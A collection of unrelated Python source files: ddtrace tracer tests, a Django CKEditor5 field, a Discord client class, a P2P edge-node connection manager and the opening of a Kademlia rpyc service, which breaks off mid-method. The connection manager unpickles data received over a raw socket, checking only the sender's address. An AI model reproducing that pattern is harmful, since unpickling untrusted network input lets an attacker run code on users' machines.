assert isinstance(rtid, six.string_types)
# Child spans should not
s2 = tracer.trace("test2")
assert s2.get_tag("runtime-id") is None
s2.finish()
s.finish()
# Parent spans should have runtime-id
s = tracer.trace("test")
s.finish()
rtid = s.get_tag("runtime-id")
assert isinstance(rtid, six.string_types)
def test_runtime_id_fork():
tracer = ddtrace.Tracer()
s = tracer.trace("test")
s.finish()
rtid = s.get_tag("runtime-id")
assert isinstance(rtid, six.string_types)
pid = os.fork()
if pid == 0:
# child
s = tracer.trace("test")
s.finish()
rtid_child = s.get_tag("runtime-id")
assert isinstance(rtid_child, six.string_types)
assert rtid != rtid_child
os._exit(12)
_, status = os.waitpid(pid, 0)
exit_code = os.WEXITSTATUS(status)
assert exit_code == 12
def test_multiple_tracer_ctx():
t1 = ddtrace.Tracer()
t2 = ddtrace.Tracer()
with t1.trace("") as s1:
with t2.trace("") as s2:
pass
assert s2.parent_id == s1.span_id
assert s2.trace_id == s1.trace_id
def test_filters(tracer, test_spans):
class FilterAll(object):
def process_trace(self, trace):
return None
tracer.configure(
settings={
"FILTERS": [FilterAll()],
}
)
with tracer.trace("root"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
assert len(spans) == 0
class FilterMutate(object):
def __init__(self, key, value):
self.key = key
self.value = value
def process_trace(self, trace):
for s in trace:
s.set_tag(self.key, self.value)
return trace
tracer.configure(
settings={
"FILTERS": [FilterMutate("boop", "beep")],
}
)
with tracer.trace("root"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
assert len(spans) == 2
s1, s2 = spans
assert s1.get_tag("boop") == "beep"
assert s2.get_tag("boop") == "beep"
# Test multiple filters
tracer.configure(
settings={
"FILTERS": [FilterMutate("boop", "beep"), FilterMutate("mats", "sundin")],
}
)
with tracer.trace("root"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
assert len(spans) == 2
for s in spans:
assert s.get_tag("boop") == "beep"
assert s.get_tag("mats") == "sundin"
class FilterBroken(object):
def process_trace(self, trace):
_ = 1 / 0
tracer.configure(
settings={
"FILTERS": [FilterBroken()],
}
)
with tracer.trace("root"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
assert len(spans) == 2
tracer.configure(
settings={
"FILTERS": [FilterMutate("boop", "beep"), FilterBroken()],
}
)
with tracer.trace("root"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
assert len(spans) == 2
for s in spans:
assert s.get_tag("boop") == "beep"
def test_early_exit(tracer, test_spans):
s1 = tracer.trace("1")
s2 = tracer.trace("2")
s1.finish()
tracer.log = mock.MagicMock(wraps=tracer.log)
s2.finish()
calls = [
mock.call("span %r closing after its parent %r, this is an error when not using async", s2, s1),
]
tracer.log.debug.assert_has_calls(calls)
assert s1.parent_id is None
assert s2.parent_id is s1.span_id
traces = test_spans.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 2
s1 = tracer.trace("1-1")
s1.finish()
assert s1.parent_id is None
s1 = tracer.trace("1-2")
s1.finish()
assert s1.parent_id is None
class TestPartialFlush(TracerTestCase):
@TracerTestCase.run_in_subprocess(
env_overrides=dict(DD_TRACER_PARTIAL_FLUSH_ENABLED="true", DD_TRACER_PARTIAL_FLUSH_MIN_SPANS="5")
)
def test_partial_flush(self):
root = self.tracer.trace("root")
for i in range(5):
self.tracer.trace("child%s" % i).finish()
traces = self.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 5
assert [s.name for s in traces[0]] == ["child0", "child1", "child2", "child3", "child4"]
root.finish()
traces = self.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 1
assert traces[0][0].name == "root"
@TracerTestCase.run_in_subprocess(
env_overrides=dict(DD_TRACER_PARTIAL_FLUSH_ENABLED="true", DD_TRACER_PARTIAL_FLUSH_MIN_SPANS="1")
)
def test_partial_flush_too_many(self):
root = self.tracer.trace("root")
for i in range(5):
self.tracer.trace("child%s" % i).finish()
traces = self.pop_traces()
assert len(traces) == 5
for t in traces:
assert len(t) == 1
assert [t[0].name for t in traces] == ["child0", "child1", "child2", "child3", "child4"]
for t in traces:
assert t[0].parent_id == root.span_id
root.finish()
traces = self.pop_traces()
assert len(traces) == 1
assert traces[0][0].name == "root"
@TracerTestCase.run_in_subprocess(
env_overrides=dict(DD_TRACER_PARTIAL_FLUSH_ENABLED="true", DD_TRACER_PARTIAL_FLUSH_MIN_SPANS="6")
)
def test_partial_flush_too_few(self):
root = self.tracer.trace("root")
for i in range(5):
self.tracer.trace("child%s" % i).finish()
traces = self.pop_traces()
assert len(traces) == 0
root.finish()
traces = self.pop_traces()
assert len(traces) == 1
assert [s.name for s in traces[0]] == ["root", "child0", "child1", "child2", "child3", "child4"]
def test_partial_flush_configure(self):
self.tracer.configure(partial_flush_enabled=True, partial_flush_min_spans=5)
self.test_partial_flush()
def test_partial_flush_too_many_configure(self):
self.tracer.configure(partial_flush_enabled=True, partial_flush_min_spans=1)
self.test_partial_flush_too_many()
def test_partial_flush_too_few_configure(self):
self.tracer.configure(partial_flush_enabled=True, partial_flush_min_spans=6)
self.test_partial_flush_too_few()
@TracerTestCase.run_in_subprocess(
env_overrides=dict(DD_TRACER_PARTIAL_FLUSH_ENABLED="false", DD_TRACER_PARTIAL_FLUSH_MIN_SPANS="6")
)
def test_partial_flush_configure_precedence(self):
self.tracer.configure(partial_flush_enabled=True, partial_flush_min_spans=5)
self.test_partial_flush()
def test_unicode_config_vals():
t = ddtrace.Tracer()
with override_global_config(dict(version=u"😇", env=u"😇")):
with t.trace("1"):
pass
t.shutdown()
def test_ctx(tracer, test_spans):
with tracer.trace("test") as s1:
assert tracer.current_span() == s1
assert tracer.current_root_span() == s1
assert tracer.current_trace_context().trace_id == s1.trace_id
assert tracer.current_trace_context().span_id == s1.span_id
with tracer.trace("test2") as s2:
assert tracer.current_span() == s2
assert tracer.current_root_span() == s1
assert tracer.current_trace_context().trace_id == s1.trace_id
assert tracer.current_trace_context().span_id == s2.span_id
with tracer.trace("test3") as s3:
assert tracer.current_span() == s3
assert tracer.current_root_span() == s1
assert tracer.current_trace_context().trace_id == s1.trace_id
assert tracer.current_trace_context().span_id == s3.span_id
assert tracer.current_trace_context().trace_id == s1.trace_id
assert tracer.current_trace_context().span_id == s2.span_id
with tracer.trace("test4") as s4:
assert tracer.current_span() == s4
assert tracer.current_root_span() == s1
assert tracer.current_trace_context().trace_id == s1.trace_id
assert tracer.current_trace_context().span_id == s4.span_id
assert tracer.current_span() == s1
assert tracer.current_root_span() == s1
assert tracer.current_span() is None
assert tracer.current_root_span() is None
assert s1.parent_id is None
assert s2.parent_id == s1.span_id
assert s3.parent_id == s2.span_id
assert s4.parent_id == s1.span_id
assert s1.trace_id == s2.trace_id == s3.trace_id == s4.trace_id
assert s1.metrics[SAMPLING_PRIORITY_KEY] == 1
assert SAMPLING_PRIORITY_KEY not in s2.metrics
assert ORIGIN_KEY not in s1.meta
t = test_spans.pop_traces()
assert len(t) == 1
assert len(t[0]) == 4
_s1, _s2, _s3, _s4 = t[0]
assert s1 == _s1
assert s2 == _s2
assert s3 == _s3
assert s4 == _s4
with tracer.trace("s") as s:
assert s.parent_id is None
assert s.trace_id != s1.trace_id
def test_multithreaded(tracer, test_spans):
def target():
with tracer.trace("s1"):
with tracer.trace("s2"):
pass
with tracer.trace("s3"):
pass
for i in range(1000):
ts = [threading.Thread(target=target) for _ in range(10)]
for t in ts:
t.start()
for t in ts:
t.join()
traces = test_spans.pop_traces()
assert len(traces) == 10
for trace in traces:
assert len(trace) == 3
def test_ctx_distributed(tracer, test_spans):
# Test activating an invalid context.
ctx = Context(span_id=None, trace_id=None)
tracer.context_provider.activate(ctx)
assert tracer.current_span() is None
with tracer.trace("test") as s1:
assert tracer.current_span() == s1
assert tracer.current_root_span() == s1
assert tracer.current_trace_context().trace_id == s1.trace_id
assert tracer.current_trace_context().span_id == s1.span_id
assert s1.parent_id is None
trace = test_spans.pop_traces()
assert len(trace) == 1
# Test activating a valid context.
ctx = Context(span_id=1234, trace_id=4321, sampling_priority=2, dd_origin="somewhere")
tracer.context_provider.activate(ctx)
assert tracer.current_span() is None
assert (
tracer.current_trace_context()
== tracer.context_provider.active()
== Context(span_id=1234, trace_id=4321, sampling_priority=2, dd_origin="somewhere")
)
with tracer.trace("test2") as s2:
assert tracer.current_span() == s2
assert tracer.current_root_span() == s2
assert tracer.current_trace_context().trace_id == s2.trace_id == 4321
assert tracer.current_trace_context().span_id == s2.span_id
assert s2.parent_id == 1234
trace = test_spans.pop_traces()
assert len(trace) == 1
assert s2.metrics[SAMPLING_PRIORITY_KEY] == 2
assert s2.meta[ORIGIN_KEY] == "somewhere"
def test_manual_keep(tracer, test_spans):
# On a root span
with tracer.trace("asdf") as s:
s.set_tag(MANUAL_KEEP_KEY)
spans = test_spans.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_KEEP
# On a child span
with tracer.trace("asdf"):
with tracer.trace("child") as s:
s.set_tag(MANUAL_KEEP_KEY)
spans = test_spans.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_KEEP
def test_manual_keep_then_drop(tracer, test_spans):
# Test changing the value before finish.
with tracer.trace("asdf") as root:
with tracer.trace("child") as child:
child.set_tag(MANUAL_KEEP_KEY)
root.set_tag(MANUAL_DROP_KEY)
spans = test_spans.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_REJECT
def test_manual_drop(tracer, test_spans):
# On a root span
with tracer.trace("asdf") as s:
s.set_tag(MANUAL_DROP_KEY)
spans = test_spans.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_REJECT
# On a child span
with tracer.trace("asdf"):
with tracer.trace("child") as s:
s.set_tag(MANUAL_DROP_KEY)
spans = test_spans.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_REJECT
@mock.patch("ddtrace.internal.hostname.get_hostname")
def test_get_report_hostname_enabled(get_hostname, tracer, test_spans):
get_hostname.return_value = "test-hostname"
with override_global_config(dict(report_hostname=True)):
with tracer.trace("span"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
root = spans[0]
child = spans[1]
assert root.get_tag(HOSTNAME_KEY) == "test-hostname"
assert child.get_tag(HOSTNAME_KEY) is None
@mock.patch("ddtrace.internal.hostname.get_hostname")
def test_get_report_hostname_disabled(get_hostname, tracer, test_spans):
get_hostname.return_value = "test-hostname"
with override_global_config(dict(report_hostname=False)):
with tracer.trace("span"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
root = spans[0]
child = spans[1]
assert root.get_tag(HOSTNAME_KEY) is None
assert child.get_tag(HOSTNAME_KEY) is None
@mock.patch("ddtrace.internal.hostname.get_hostname")
def test_get_report_hostname_default(get_hostname, tracer, test_spans):
get_hostname.return_value = "test-hostname"
with override_global_config(dict(report_hostname=False)):
with tracer.trace("span"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
root = spans[0]
child = spans[1]
assert root.get_tag(HOSTNAME_KEY) is None
assert child.get_tag(HOSTNAME_KEY) is None
def test_non_active_span(tracer, test_spans):
with tracer.start_span("test", activate=False):
assert tracer.current_span() is None
assert tracer.current_root_span() is None
assert tracer.current_span() is None
assert tracer.current_root_span() is None
traces = test_spans.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 1
with tracer.start_span("test1", activate=False):
with tracer.start_span("test2", activate=False):
assert tracer.current_span() is None
assert tracer.current_root_span() is None
assert tracer.current_span() is None
assert tracer.current_root_span() is None
traces = test_spans.pop_traces()
assert len(traces) == 2
with tracer.start_span("active", activate=True) as active:
with tracer.start_span("non active", child_of=active, activate=False):
assert tracer.context_provider.active() is active
assert tracer.current_root_span() is active
assert tracer.context_provider.active() is active
assert tracer.current_root_span() is active
traces = test_spans.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 2
def test_service_mapping():
@contextlib.contextmanager
def override_service_mapping(service_mapping):
with override_env(dict(DD_SERVICE_MAPPING=service_mapping)):
assert ddtrace.config.service_mapping == {}
ddtrace.config.service_mapping = Config().service_mapping
yield
ddtrace.config.service_mapping = {}
# Test single mapping
with override_service_mapping("foo:bar"), ddtrace.Tracer().trace("renaming", service="foo") as span:
assert span.service == "bar"
# Test multiple mappings
with override_service_mapping("foo:bar,sna:fu"), ddtrace.Tracer().trace("renaming", service="sna") as span:
assert span.service == "fu"
# Test colliding mappings
with override_service_mapping("foo:bar,foo:foobar"), ddtrace.Tracer().trace("renaming", service="foo") as span:
assert span.service == "foobar"
# Test invalid service mapping
with override_service_mapping("foo;bar,sna:fu"):
with ddtrace.Tracer().trace("passthru", service="foo") as _:
assert _.service == "foo"
with ddtrace.Tracer().trace("renaming", "sna") as _:
assert _.service == "fu"
def test_configure_url_partial():
tracer = ddtrace.Tracer()
tracer.configure(hostname="abc")
assert tracer.writer.agent_url == "http://abc:8126"
tracer.configure(port=123)
assert tracer.writer.agent_url == "http://abc:123"
tracer = ddtrace.Tracer(url="http://abc")
assert tracer.writer.agent_url == "http://abc"
tracer.configure(port=123)
assert tracer.writer.agent_url == "http://abc:123"
tracer.configure(port=431)
assert tracer.writer.agent_url == "http://abc:431"
def test_bad_agent_url(monkeypatch):
with pytest.raises(ValueError):
Tracer(url="bad://localhost:8126")
monkeypatch.setenv("DD_TRACE_AGENT_URL", "bad://localhost:1234")
with pytest.raises(ValueError) as e:
Tracer()
assert (
str(e.value)
== "Unsupported protocol 'bad' in Agent URL 'bad://localhost:1234'. Must be one of: http, https, unix"
)
monkeypatch.setenv("DD_TRACE_AGENT_URL", "unix://")
with pytest.raises(ValueError) as e:
Tracer()
assert str(e.value) == "Invalid file path in Agent URL 'unix://'"
monkeypatch.setenv("DD_TRACE_AGENT_URL", "http://")
with pytest.raises(ValueError) as e:
Tracer()
assert str(e.value) == "Invalid hostname in Agent URL 'http://'"
def test_context_priority(tracer, test_spans):
"""Assigning a sampling_priority should not affect if the trace is sent to the agent"""
for p in [priority.USER_REJECT, priority.AUTO_REJECT, priority.AUTO_KEEP, priority.USER_KEEP, None, 999]:
with tracer.trace("span_%s" % p) as span:
span.context.sampling_priority = p
# Spans should always be written regardless of sampling priority since
# the agent needs to know the sampling decision.
spans = test_spans.pop()
assert len(spans) == 1, "trace should be sampled"
if p in [priority.USER_REJECT, priority.AUTO_REJECT, priority.AUTO_KEEP, priority.USER_KEEP]:
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] == p
def test_spans_sampled_out(tracer, test_spans):
with tracer.trace("root") as span:
span.sampled = False
with tracer.trace("child") as span:
span.sampled = False
with tracer.trace("child") as span:
span.sampled = False
spans = test_spans.pop()
assert len(spans) == 0
def test_spans_sampled_one(tracer, test_spans):
with tracer.trace("root") as span:
span.sampled = False
with tracer.trace("child") as span:
span.sampled = False
with tracer.trace("child") as span:
span.sampled = True
spans = test_spans.pop()
assert len(spans) == 3
def test_spans_sampled_all(tracer, test_spans):
with tracer.trace("root") as span:
span.sampled = True
with tracer.trace("child") as span:
span.sampled = True
with tracer.trace("child") as span:
span.sampled = True
spans = test_spans.pop()
assert len(spans) == 3
def test_closing_other_context_spans_single_span(tracer, test_spans):
"""
Ensure that a span created in one thread can be finished in another without
breaking the active span management.
"""
def _target(span):
assert tracer.current_span() is None
span.finish()
assert tracer.current_span() is None
span = tracer.trace("main thread")
assert tracer.current_span() is span
t1 = threading.Thread(target=_target, args=(span,))
t1.start()
t1.join()
assert tracer.current_span() is None
spans = test_spans.pop()
assert len(spans) == 1
def test_closing_other_context_spans_multi_spans(tracer, test_spans):
"""
Ensure that spans created in one thread can be finished in another without
breaking the active span management.
"""
def _target(span):
assert tracer.current_span() is None
span.finish()
assert tracer.current_span() is None
root = tracer.trace("root span")
span = tracer.trace("child span")
assert tracer.current_span() is span
t1 = threading.Thread(target=_target, args=(span,))
t1.start()
t1.join()
assert tracer.current_span() is root
root.finish()
spans = test_spans.pop()
assert len(spans) == 2
def test_fork_manual_span_same_context(tracer):
span = tracer.trace("test")
pid = os.fork()
if pid == 0:
child = tracer.start_span("child", child_of=span)
assert child.parent_id == span.span_id
assert child._parent is None
# No strong reference to the current span should remain, to avoid memory leaks.
assert tracer.current_span() is None
child.finish()
os._exit(12)
span.finish()
_, status = os.waitpid(pid, 0)
exit_code = os.WEXITSTATUS(status)
assert exit_code == 12
def test_fork_manual_span_different_contexts(tracer):
span = tracer.start_span("test")
pid = os.fork()
if pid == 0:
child = tracer.start_span("child", child_of=span)
assert child.parent_id == span.span_id
assert child._parent is None
assert tracer.current_span() is None
child.finish()
os._exit(12)
span.finish()
_, status = os.waitpid(pid, 0)
exit_code = os.WEXITSTATUS(status)
assert exit_code == 12
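# --- Usage sketch (not part of the original test file) ---
# A minimal sketch of registering a trace filter on the global tracer, mirroring
# the FilterMutate pattern exercised in test_filters above; the filter class name
# and tag values are illustrative only.
#
# import ddtrace
#
# class AddDeploymentTag(object):
#     def process_trace(self, trace):
#         for span in trace:
#             span.set_tag("deployment", "canary")
#         return trace  # returning None would drop the whole trace
#
# ddtrace.tracer.configure(settings={"FILTERS": [AddDeploymentTag()]})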
|
fields.py
|
import re
from pathlib import Path
from threading import Thread
from django.conf import settings
from django.core.files.storage import FileSystemStorage
from django.db import models
from django.db.models.signals import post_delete
from .widgets import CKEditor5Widget
def delete_images(instance):
for field in instance._meta.get_fields():
if type(field).__name__ == 'CKEditor5Field':
text = getattr(instance, field.attname)
for url in re.findall('src="([^"]+)"', text):
fs = FileSystemStorage()
folder = getattr(settings, 'CKEDITOR_5_UPLOADS_FOLDER', 'django_ckeditor_5')
uploads_path = Path(settings.MEDIA_ROOT, folder, url.split('/')[-1])
if fs.exists(uploads_path):
fs.delete(uploads_path)
class CKEditor5Field(models.Field):
def __init__(self, *args, config_name='default', **kwargs):
self.config_name = config_name
super().__init__(*args, **kwargs)
def get_internal_type(self):
if hasattr(self, 'model'):
post_delete.connect(CKEditor5Field.clean_images, sender=self.model)
return "TextField"
def formfield(self, **kwargs):
return super(CKEditor5Field, self).formfield(**{
'max_length': self.max_length,
**({'widget': CKEditor5Widget(config_name=self.config_name)}),
**kwargs,
})
@staticmethod
def clean_images(sender, instance, **kwargs):
Thread(target=delete_images, args=(instance, )).start()
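# --- Usage sketch (not part of the original file) ---
# A minimal sketch, assuming a Django project with this app installed; the
# "Article" model and its fields are hypothetical names used only for illustration.
#
# from django.db import models
# from django_ckeditor_5.fields import CKEditor5Field
#
# class Article(models.Model):
#     title = models.CharField(max_length=200)
#     body = CKEditor5Field(config_name='default', blank=True)
#
# Deleting an Article instance fires the post_delete signal connected in
# get_internal_type(), which starts a thread running delete_images() to remove
# any uploaded files referenced by src="..." in the stored HTML.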
|
Client.py
|
import asyncio
import time
import threading
from .HTTPSCLIENT import HTTPClient, opcode
from .Log import Log
from .Guild import Guild
class Client:
def __init__(self, Log = False):
"""
The Client class to instantiate a Discord Client.
Parameters
----------
Optional: Bool Log | Default = False
Prints out extra information.
"""
self.Log = Log
self.Loop = asyncio.get_event_loop()
self.handlers = {}
self.uptime = 0
self.guilds = []
def run(self, TOKEN, SECRET):
"""
This function starts the client.
Returns nothing.
Parameters
----------
Required: String Token
The Client Token you get on https://discord.com/developers/applications/{AppID}/bot
Required: String Secret
The Client Secret you get on https://discord.com/developers/applications/{AppID}/oauth2
"""
self.Token=TOKEN
self.Secret=SECRET
self.HTTPClient = HTTPClient(self)
self.GatewayThread = threading.Thread(target=self.HTTPClient.connect)
self.GatewayThread.setName("Gateway")
self.GatewayThread.start()
self.UptimeThread = threading.Thread(target=self.counttime)
self.UptimeThread.setName("Uptime")
self.UptimeThread.start()
self.Loop.run_forever()
def event(self, method):
"""
Putting
@client.event("event")
above a function will make it get called every time that specific event happens.
Events
------
on_ready(): gets called when the client is ready to interact with discord.
on_message(): gets called when a message gets posted into a discord guild and includes a message object in the function parameters.
Example
-------
>>> @client.event("on_ready")
>>> async def my_function():
>>> print("Bot is logged in.")
"""
def registerhandler(handler):
if method in self.handlers:
self.handlers[method].append(handler)
else:
self.handlers[method] = [handler]
return handler
return registerhandler
def counttime(self):
"""
This is not meant to be used outside the package!
Use client.get_uptime() instead!
"""
while True:
self.uptime += 1
time.sleep(1)
def call_event(self, type, *args, **kwargs):
"""
This is not meant to be used outside the package!
"""
Log.Debug(self, "Calling " + type + " event.")
if type in self.handlers:
for Method in self.handlers[type]:
asyncio.run(Method(*args, **kwargs))
async def set_status(self, state, activity=""):
"""
This function is used to set the client's status and activity.
Because of the way discord works, it might take a while to update status and activity.
Parameters
----------
Required: str State:
"online" / "idle" / "dnd" / "invisible"
Anything else won't work and results in an error.
Currently required: str Activity:
Example: "Counting sheep... zzz"
"""
Log.Debug(self, "Setting status to {} and activity to {}...".format(state, activity))
self.HTTPClient.Send_API(opcode.Status_update(state, activity))
return
async def get_guild(self, id):
"""
This function returns a guild object.
Parameters
----------
Required: guild_id
The guild id of the desired guild
"""
guild = self.HTTPClient.get_guild(id)
return guild
async def get_channel(self, id):
"""
This function returns a channel object.
Parameters
----------
Required: channel_id
The channel id of the desired channel
"""
channel = self.HTTPClient.get_channel(id)
return channel
async def get_guilds(self) -> list[Guild]:
"""
This function will return a list with all guilds your client is in.
"""
return self.guilds
async def get_guild_count(self) -> int:
"""
This function will return an integer that represents how many guilds the bot is currently in.
"""
guilds = len(self.guilds)
return guilds
async def get_uptime(self) -> int:
"""
This function will return an integer that represents how many seconds the bot has been online.
"""
return self.uptime
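# --- Usage sketch (not part of the original file) ---
# A minimal sketch of how this Client is intended to be driven, based only on
# the methods above; the token and secret strings are placeholders.
#
# client = Client(Log=True)
#
# @client.event("on_ready")
# async def ready():
#     print("Bot is ready, uptime:", await client.get_uptime())
#
# @client.event("on_message")
# async def on_message(message):
#     print("New message:", message)
#
# client.run("YOUR_BOT_TOKEN", "YOUR_CLIENT_SECRET")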
|
connection_manager_4edge.py
|
import socket
import threading
import pickle
import codecs
from concurrent.futures import ThreadPoolExecutor
from .core_node_list import CoreNodeList
from .message_manager import (
MessageManager,
MSG_CORE_LIST,
MSG_PING,
MSG_ADD_AS_EDGE,
ERR_PROTOCOL_UNMATCH,
ERR_VERSION_UNMATCH,
OK_WITH_PAYLOAD,
OK_WITHOUT_PAYLOAD,
)
# Value for testing; in practice something around 30 minutes (1800) would be more appropriate
PING_INTERVAL = 10
class ConnectionManager4Edge(object):
def __init__(self, host, my_port, my_core_host, my_core_port, callback):
print('Initializing ConnectionManager4Edge...')
self.host = host
self.port = my_port
self.my_core_host = my_core_host
self.my_core_port = my_core_port
self.core_node_set = CoreNodeList()
self.mm = MessageManager()
self.callback = callback
def start(self):
"""
Called when starting the initial listening socket (intended for ClientCore).
"""
t = threading.Thread(target=self.__wait_for_access)
t.start()
self.ping_timer = threading.Timer(PING_INTERVAL, self.__send_ping)
self.ping_timer.start()
def connect_to_core_node(self, my_pubkey=None):
"""
Connect to a known Core node specified by the user (intended for ClientCore).
params:
my_pubkey : the public key registered in this ClientCore
"""
self.my_pubkey = my_pubkey
self.__connect_to_P2PNW(self.my_core_host,self.my_core_port)
def get_message_text(self, msg_type, payload = None):
"""
Build and return a protocol message of the specified message type.
params:
msg_type : type of the message to build, as defined by MessageManager
payload : optional data to embed in the message
return:
msgtxt : JSON-formatted message generated by MessageManager's build_message
"""
msgtxt = self.mm.build(msg_type, self.port, payload)
print('generated_msg:', msgtxt)
return msgtxt
def send_msg(self, peer, msg):
"""
Send a message to the specified node.
params:
peer : tuple holding the destination IP address and port number
msg : message to send (expected to be JSON-formatted)
"""
print('Sending... ', msg)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((peer))
s.sendall(msg.encode('utf-8'))
s.close()
except Exception:
print('Connection failed for peer : ', peer)
self.core_node_set.remove(peer)
print('Trying to connect to the P2P network...')
current_core_list = self.core_node_set.get_list()
if len(current_core_list) != 0:
new_core = self.core_node_set.get_c_node_info()
self.my_core_host = new_core[0]
self.my_core_port = new_core[1]
self.connect_to_core_node(self.my_pubkey)
self.send_msg((new_core[0], new_core[1]), msg)
else:
print('No core node found in our list...')
self.ping_timer.cancel()
def connection_close(self):
"""
Close the sockets as part of shutdown.
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect( (self.host, self.port))
self.socket.close()
s.close()
self.ping_timer.cancel()
def __connect_to_P2PNW(self, host, port):
"""
Send a connection request message to the specified Core node.
params:
host : IP address of the Core node to connect to
port : port number of the Core node to connect to
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
msg = self.mm.build(MSG_ADD_AS_EDGE, self.port, self.my_pubkey)
print(msg)
s.sendall(msg.encode('utf-8'))
s.close()
def __wait_for_access(self):
"""
Open the server socket and start listening for incoming connections.
"""
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.bind((self.host, self.port))
self.socket.listen(0)
executor = ThreadPoolExecutor(max_workers=10)
while True:
print('Waiting for the connection ...')
soc, addr = self.socket.accept()
print('Connected by .. ', addr)
data_sum = ''
params = (soc, addr, data_sum)
executor.submit(self.__handle_message, params)
def __handle_message(self, params):
"""
Inspect a received message and handle it according to its content.
Not intended to be used from outside this class.
params :
soc : socket connection that received the data
addr : address information of the sender
data_sum : empty string used as the base for concatenating received data
"""
soc, addr, data_sum = params
while True:
data = soc.recv(1024)
data_sum = data_sum + data.decode('utf-8')
if not data:
break
if not data_sum:
return
result, reason, cmd, peer_port, payload = self.mm.parse(data_sum)
print(result, reason, cmd, peer_port, payload)
status = (result, reason)
if status == ('error', ERR_PROTOCOL_UNMATCH):
print('Error: Protocol name is not matched')
return
elif status == ('error', ERR_VERSION_UNMATCH):
print('Error: Protocol version is not matched')
return
elif status == ('ok', OK_WITHOUT_PAYLOAD):
if cmd == MSG_PING:
pass
else:
# Edge nodes are not expected to handle messages other than connection information
print('Edge node does not have functions for this message!')
elif status == ('ok', OK_WITH_PAYLOAD):
if cmd == MSG_CORE_LIST:
# There is at least a hook for receiving the core node list requested from a Core node
if self.my_core_host == addr[0] and self.my_core_port == peer_port:
new_core_set = pickle.loads(payload.encode('utf8'))
checked = False
for c in new_core_set:
if c == (addr[0], peer_port):
checked = True
if checked:
print('List from Central. Refresh the core node list...')
print('latest core node list: ', new_core_set)
self.core_node_set.overwrite(new_core_set)
else:
print('received unsafe core node list... from', (addr[0], peer_port))
else:
print('received unsafe core node list... from', (addr[0], peer_port))
else:
self.callback((result, reason, cmd, peer_port, payload))
else:
print('Unexpected status', status)
def __send_ping(self):
"""
Actual implementation of sending the keep-alive message; the check keeps being rescheduled periodically from within this method.
param:
peer : connection info (IP address and port number) of the node the keep-alive message is sent to
"""
peer = (self.my_core_host, self.my_core_port)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((peer))
msg = self.mm.build(MSG_PING)
s.sendall(msg.encode('utf-8'))
s.close()
except Exception:
print('Connection failed for peer : ', peer)
self.core_node_set.remove(peer)
print('Trying to connect to the P2P network...')
current_core_list = self.core_node_set.get_list()
if len(current_core_list) != 0:
new_core = self.core_node_set.get_c_node_info()
self.my_core_host = new_core[0]
self.my_core_port = new_core[1]
self.connect_to_core_node(self.my_pubkey)
else:
print('No core node found in our list...')
self.ping_timer.cancel()
self.ping_timer = threading.Timer(PING_INTERVAL, self.__send_ping)
self.ping_timer.start()
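# --- Usage sketch (not part of the original file) ---
# A minimal sketch of how a ClientCore-like caller might drive this class; the
# hosts, ports and callback are placeholders.
#
# def application_callback(msg_tuple):
#     result, reason, cmd, peer_port, payload = msg_tuple
#     print('application message:', cmd, payload)
#
# cm = ConnectionManager4Edge('127.0.0.1', 50090, '127.0.0.1', 50082, application_callback)
# cm.start()                 # open the listening socket and schedule periodic pings
# cm.connect_to_core_node()  # send MSG_ADD_AS_EDGE to the known Core node
# ...
# cm.connection_close()      # close sockets and cancel the ping timer before exit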
|
kademlia.py
|
from logging import debug, error
from queue import Empty, Queue
from random import randint
from threading import Semaphore, Thread
from time import sleep
from rpyc import Connection, discover, Service
from rpyc.utils.factory import DiscoveryError
from .bucket_table import BucketTable
from .contact import Contact
from .utils import connect, get_id, KContactSortedArray, IterativeManager, try_function
class KademliaService(Service):
def __init__(self, k: int, b: int, a: int, update_time: int = None):
super(KademliaService, self).__init__()
debug(f'KademliaService.__init__ - Executing the init with k: {k}, b: {b} and a: {a}')
self.a = a
self.is_started_node = False
self.data = {}
self.data_lock = Semaphore()
self.lamport = 0
self.lamport_lock = Semaphore()
self.k = k
self.b = b
self.is_initialized = False
self.is_initialized_lock = Semaphore()
self.my_contact = None
self.table = None
self.update_time = update_time
def exposed_init(self, contact: Contact):
if self.is_initialized:
return True
self.my_contact = Contact.from_json(contact)
debug(f'KademliaService.exposed_init - Initializing with contact: {contact}.')
debug(f'KademliaService.exposed_init - Executing the init with the contact: {self.my_contact}')
self.table = BucketTable(self.k, self.b, self.my_contact.id)
self.is_initialized = True
debug(f'KademliaService.exposed_init - End initializing with contact: {contact}.')
return True
def exposed_ping(self, client: Contact, client_lamport: int) -> bool:
if not self.is_initialized:
error(f'KademliaService.exposed_ping - Instance not initialized')
return None, self.lamport
client = Contact.from_json(client)
debug(f'KademliaService.exposed_ping - Incoming connection from {client}.')
self.update_lamport(client_lamport)
self.update_contact(client)
debug(f'KademliaService.exposed_ping - End of connection from {client}.')
return self.my_contact.to_json(), self.lamport
def exposed_client_update_network(self):
if not self.is_initialized:
error(f'KademliaService.exposed_client_update_network - Instance not initialized')
service_name = KademliaService.get_name(self.__class__)
peers = discover(service_name)
for peer in peers:
tcontact = Contact(get_id(peer), *peer)
debug(f'KademliaService.exposed_client_update_network - Making ping to peer: {tcontact}')
result, _ = self.ping_to(tcontact)
if result:
debug(f'KademliaService.exposed_client_update_network - Successful ping to peer: {tcontact}')
else:
